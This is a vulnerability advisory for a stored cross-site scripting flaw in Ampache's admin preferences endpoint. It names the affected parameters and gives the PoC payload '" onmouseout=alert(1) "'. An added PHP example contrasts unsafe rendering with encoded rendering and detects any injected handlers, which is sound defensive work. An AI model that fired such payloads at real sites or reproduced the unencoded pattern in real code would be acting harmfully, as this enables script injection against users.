Summary
Stored Cross-Site Scripting (XSS) vulnerability in Ampache before v6.2.1 allows a remote attacker to execute code via a crafted payload to several parameters in the POST request to /preferences.php?action=admin_update_preferences.
Severity: low
Details
POST /preferences.php?action=admin_update_preferences HTTP/1.1
Host: localhost
Origin: http://localhost
Referer: http://localhost/admin/users.php?action=show_preferences&user_id=1
The affected parameters include: api_hidden_playlists, libitem_browse_alpha, custom_blankalbum, custom_blankmovie and so on.
PoC
" onmouseout=alert(1) "
Impact
Stored XSS
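
If the stored preference is echoed into a double-quoted HTML attribute (an assumption; the advisory does not show the rendering code), the PoC's leading quote ends the value and `onmouseout` becomes a separate attribute. The PHP below is an added example, not Ampache's own code: it renders the PoC value with and without attribute-context encoding and parses both results to show whether an event handler was created. The function names are hypothetical.

```php
<?php
// Added example, not Ampache source. Function names are hypothetical.
// Assumes the stored preference is rendered into an <input value="..."> attribute.
// Requires the PHP dom extension.

// Vulnerable pattern: stored value concatenated into the attribute unencoded.
function render_pref_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_pref_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
        . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

// Parse the rendered markup with libxml and return any event-handler
// attributes (on*) that ended up on the <input> element.
function injected_handlers(string $html): array
{
    $previous = libxml_use_internal_errors(true); // malformed markup is expected
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $handlers = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                $handlers[$attr->name] = $attr->value;
            }
        }
    }
    return $handlers;
}

$name   = 'custom_blankalbum';        // parameter named in the advisory
$stored = '" onmouseout=alert(1) "';  // PoC value from the advisory

foreach (['unsafe' => 'render_pref_unsafe', 'safe' => 'render_pref_safe'] as $label => $render) {
    $html = $render($name, $stored);
    echo $label, ': ', $html, PHP_EOL;
    echo '  event handlers parsed: ', json_encode(injected_handlers($html)), PHP_EOL;
}
```

The same parse-and-check function can be used in a regression test over every preference field the settings page renders.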